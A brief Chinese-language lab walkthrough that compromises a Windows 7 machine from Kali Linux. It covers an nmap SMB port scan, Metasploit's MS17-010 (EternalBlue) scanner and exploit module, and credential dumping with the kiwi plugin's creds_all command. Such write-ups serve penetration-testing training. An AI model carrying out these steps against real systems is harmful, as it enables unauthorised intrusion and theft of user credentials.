攻击机:kali linux系统
目标机:windows7系统
端口扫描
nmap扫描目标机开放的端口
发现开放135、139和445端口,运行SMB服务。
漏洞扫描
kali终端输入msfconsole,启动metasploit工具。
搜索永恒之蓝漏洞扫描脚本(search ms17-010),设置好扫描信息配置,最后输入”run”运行脚本。
扫描发现目标机存在永恒之蓝漏洞。
漏洞利用
使用ms17-010漏洞利用脚本(use exploit/windows/smb/ms17_010_eternalblue),查看所需的参数信息(show options),并设置目标参数,最后输入”run”运行脚本。
漏洞利用成功。
后期漏洞利用
加载kiwi插件(load kiwi),获取目标机的本地用户名和密码(creds_all)。
注:在一小部分的系统上无法成功获取用户名密码。